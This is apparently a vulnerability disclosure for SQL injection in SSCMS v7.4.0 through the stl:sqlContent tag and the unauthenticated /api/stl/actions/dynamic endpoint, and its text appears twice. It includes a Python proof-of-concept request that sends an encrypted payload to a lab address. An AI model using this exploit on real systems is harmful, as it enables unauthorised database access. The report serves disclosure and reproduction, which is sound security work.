Vulnerability Conditions
SSCMS v7.4.0 + SQLite + administrator (security_key) privileges
Vulnerability Details
Code auditing revealed that in the component, the queryString attribute of the stl:sqlContent tag is directly appended to the SQL query for execution, without using parameterized queries. This allows attackers to construct malicious SQL statements to achieve arbitrary SQL execution.
The system's /api/stl/actions/dynamic interface receives encrypted parameters in an unauthenticated state, and then decrypts and parses the STL template content. This ultimately allows attackers to construct malicious SQL statements to achieve arbitrary SQL execution.
Assuming we know the encryption key, I hardcoded the key in the Dockerfile during environment setup for easy vulnerability reproduction.
If the key is unknown, you need to log in as an administrator and manually encrypt the payload.
Then, the encrypted payload is concatenated and sent as a POST request. Successful execution returns the result of the SQL statement.
encrypted = "4cc31f966e1a4396405f49df5e6d44b1a14d63f3208d1a68a5686d2694d179821ea46815a47b98a247e204fb1922f560687e64642ddaaacd08d0a8132ffe0abbf7463e346548720866d9c35d651888fabac0df545d6c1da32702b40f3dff71cf2445129440b8d0525f8cd763d5b8f97586d4c34fc17c291a48abe63f4ad008b7c18962241bb13a3f539172e8940e9456d62ebeba3b00c0259448a151eca2eb6740fa9f1bf278a9488ba28713dea703664049e56994080b522f4043cf739625a51a5b09ea43d43079d84aec07a536f7150f395973f86661faff1bd0e58c466ead2a3e754abc4efb879f149e5de94bd0de574e14a8a57460e17ce33da13741078e1143ac0aff425c31674355b5da2abf91e87aa5f1a42f8e15b1cf6305c286818e2aacdeba70d868ebbe6af1ffee879594" url = 'http://192.168.197.128:5000/api/stl/actions/dynamic' resp = requests.post(url, json={'value': encrypted, 'page': 1}) print('Status:', resp.status_code) print('Response:', resp.text)
Successfully read database content; this was done in an unauthorized state.
Vulnerability Conditions
SSCMS v7.4.0 + SQLite + administrator (security_key) privileges
Vulnerability Details
Code auditing revealed that in the component, the queryString attribute of the stl:sqlContent tag is directly appended to the SQL query for execution, without using parameterized queries. This allows attackers to construct malicious SQL statements to achieve arbitrary SQL execution.
The system's
/api/stl/actions/dynamicinterface receives encrypted parameters in an unauthenticated state, and then decrypts and parses the STL template content. This ultimately allows attackers to construct malicious SQL statements to achieve arbitrary SQL execution.Assuming we know the encryption key, I hardcoded the key in the Dockerfile during environment setup for easy vulnerability reproduction.
If the key is unknown, you need to log in as an administrator and manually encrypt the payload.
Then, the encrypted payload is concatenated and sent as a POST request. Successful execution returns the result of the SQL statement.
encrypted = "4cc31f966e1a4396405f49df5e6d44b1a14d63f3208d1a68a5686d2694d179821ea46815a47b98a247e204fb1922f560687e64642ddaaacd08d0a8132ffe0abbf7463e346548720866d9c35d651888fabac0df545d6c1da32702b40f3dff71cf2445129440b8d0525f8cd763d5b8f97586d4c34fc17c291a48abe63f4ad008b7c18962241bb13a3f539172e8940e9456d62ebeba3b00c0259448a151eca2eb6740fa9f1bf278a9488ba28713dea703664049e56994080b522f4043cf739625a51a5b09ea43d43079d84aec07a536f7150f395973f86661faff1bd0e58c466ead2a3e754abc4efb879f149e5de94bd0de574e14a8a57460e17ce33da13741078e1143ac0aff425c31674355b5da2abf91e87aa5f1a42f8e15b1cf6305c286818e2aacdeba70d868ebbe6af1ffee879594" url = 'http://192.168.197.128:5000/api/stl/actions/dynamic' resp = requests.post(url, json={'value': encrypted, 'page': 1}) print('Status:', resp.status_code) print('Response:', resp.text)Successfully read database content; this was done in an unauthorized state.